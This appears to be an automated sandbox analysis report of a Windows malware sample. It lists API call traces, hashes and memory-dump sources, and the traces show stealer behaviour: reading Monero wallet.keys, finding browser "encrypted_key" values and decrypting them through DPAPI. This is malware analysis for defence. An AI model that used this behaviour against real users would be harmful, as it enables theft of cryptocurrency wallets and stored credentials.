                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 69ea938fb5896ef15950b681c81c858d49a04a3656aeb9636d3477c431a96d36
                        • Instruction ID: ac61f5692d9e03bbadc998cc3b28e9d01c973e601d1c27baa7c0a968ab2a3493
                        • Opcode Fuzzy Hash: 69ea938fb5896ef15950b681c81c858d49a04a3656aeb9636d3477c431a96d36
                        • Instruction Fuzzy Hash: 1EE0E675A80209BBD724DB94E909E5977B8EF44B02F004164FD0A97244D9719E509B55
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 00F0A3FF
                        • lstrlen.KERNEL32(00000000), ref: 00F0A6BC
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: f0891e640c27a5e8cccdf5da07f9e91f26427a4d66761f051455b95b1ac2393f
                        • Instruction ID: 3f9944420e8422c6ecb35aae6363cd3cf2847edc7844b03c670b6cd1ad1fa7b7
                        • Opcode Fuzzy Hash: f0891e640c27a5e8cccdf5da07f9e91f26427a4d66761f051455b95b1ac2393f
                        • Instruction Fuzzy Hash: BBE136728111089BDB15FBA4DD91EEE733CAF14310F508169F51772091EF386A8EDB62
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0D481
                        • lstrlen.KERNEL32(00000000), ref: 00F0D698
                        • lstrlen.KERNEL32(00000000), ref: 00F0D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 49055be967160f2748e724119ab9b13ce2a036d64b5fb0e15dbf8b5412d8f19e
                        • Instruction ID: 65f2f1fa50700fdd748b4f9e7280093856083e76cd536bef6aaf1257512ed191
                        • Opcode Fuzzy Hash: 49055be967160f2748e724119ab9b13ce2a036d64b5fb0e15dbf8b5412d8f19e
                        • Instruction Fuzzy Hash: 1B9138728111089BDB14FBA0DD52DEE7338AF54320F504169F517B7091EF396A8AEB62
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0D801
                        • lstrlen.KERNEL32(00000000), ref: 00F0D99F
                        • lstrlen.KERNEL32(00000000), ref: 00F0D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: a87d8baa5f3e930048d561a09de966011e0f5cb63d182affc33f548986233139
                        • Instruction ID: dcbf6059fc160eac03481dbbe6028b541ad51b9939be6fbb1362f2183fe6c9c9
                        • Opcode Fuzzy Hash: a87d8baa5f3e930048d561a09de966011e0f5cb63d182affc33f548986233139
                        • Instruction Fuzzy Hash: 798145729511089BDB18FBA0DD52DEE7338BF54320F504128F417A70D1EF396A8AEB62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: cce39353c9ff0bdacc09ab5ed7fb00fea89ea07ab8538924e375442829c239ed
                        • Instruction ID: 5dc67c511267931465b9874cad194d22504e09fc58c78bcbd16fa912e8900fa5
                        • Opcode Fuzzy Hash: cce39353c9ff0bdacc09ab5ed7fb00fea89ea07ab8538924e375442829c239ed
                        • Instruction Fuzzy Hash: 9F4141B1D10109ABCB04EFA4DD45EEEB778EF54714F008018F41677281EB399A85EFA2
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F09D39
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09AEF
                          • Part of subcall function 00F09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F04EEE,00000000,?), ref: 00F09B01
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09B2A
                          • Part of subcall function 00F09AC0: LocalFree.KERNEL32(?,?,?,?,00F04EEE,00000000,?), ref: 00F09B3F
                          • Part of subcall function 00F09B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F09B84
                          • Part of subcall function 00F09B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F09BA3
                          • Part of subcall function 00F09B60: LocalFree.KERNEL32(?), ref: 00F09BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 8962a82e0cdcb7cf5e895c1fb1351e79d00f84ab970ee9238d761663922de62b
                        • Instruction ID: 865c9d60f088b4e68967bd5ebd00bd0fda08aa81ddeee535e58b630197657a53
                        • Opcode Fuzzy Hash: 8962a82e0cdcb7cf5e895c1fb1351e79d00f84ab970ee9238d761663922de62b
                        • Instruction Fuzzy Hash: 003181B5D01109ABCF04EFE4DC85AEFB7B9BF48300F144518E911A7282F7749A04EBA1
                        APIs
                        • CreateFileA.KERNEL32(00F13AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00F13AEE,?), ref: 00F192FC
                        • GetFileSizeEx.KERNEL32(000000FF,00F13AEE), ref: 00F19319
                        • CloseHandle.KERNEL32(000000FF), ref: 00F19327
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: d65d53cc39d849035ce3ee3fbebdd2b88038fa7000efe2ee5a06b49bdb675039
                        • Instruction ID: 302b7781d1f8575963881378e146f567ee75b9563c6780c296e0763a5fbba2d7
                        • Opcode Fuzzy Hash: d65d53cc39d849035ce3ee3fbebdd2b88038fa7000efe2ee5a06b49bdb675039
                        • Instruction Fuzzy Hash: 0CF0A439E44204BBDB24DFB0EC14F9E77B9AB48721F11C164B622A72C4D6B596809B80
                        APIs
                        • __getptd.LIBCMT ref: 00F1C74E
                          • Part of subcall function 00F1BF9F: __amsg_exit.LIBCMT ref: 00F1BFAF
                        • __getptd.LIBCMT ref: 00F1C765
                        • __amsg_exit.LIBCMT ref: 00F1C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00F1C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 6dde2f75e2edefb2b46ef6bdfd50898e49b0bfae7c86f7c5ac8ad30f12653b18
                        • Instruction ID: 0ce9af5049fd784ca2a205d17548231f585890c56b9f21a6384bd8ce880c85ca
                        • Opcode Fuzzy Hash: 6dde2f75e2edefb2b46ef6bdfd50898e49b0bfae7c86f7c5ac8ad30f12653b18
                        • Instruction Fuzzy Hash: 0BF09A32D85714DBD720BBB8AC07BDE37A06F00720F244149F814AA1D2DBAC59C2BF96
                        APIs
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14F7A
                        • lstrcat.KERNEL32(?,00F21070), ref: 00F14F97
                        • lstrcat.KERNEL32(?,008A9960), ref: 00F14FAB
                        • lstrcat.KERNEL32(?,00F21074), ref: 00F14FBD
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F1492C
                          • Part of subcall function 00F14910: FindFirstFileA.KERNEL32(?,?), ref: 00F14943
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FDC), ref: 00F14971
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FE0), ref: 00F14987
                          • Part of subcall function 00F14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F14B7D
                          • Part of subcall function 00F14910: FindClose.KERNEL32(000000FF), ref: 00F14B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: bfa268093a5855f86fcb9ae3e6e729ffaa93a3e0ec9ef7dce6ea455103c14d56
                        • Instruction ID: 31ae9b381ff211c334a960346f93a931a68b206f78fcae78ecc0a35a3275c533
                        • Opcode Fuzzy Hash: bfa268093a5855f86fcb9ae3e6e729ffaa93a3e0ec9ef7dce6ea455103c14d56
                        • Instruction Fuzzy Hash: 9121D67A94020867D768FBA0FC46EE9333CAB54B00F404554B65A97085EE789AC99B92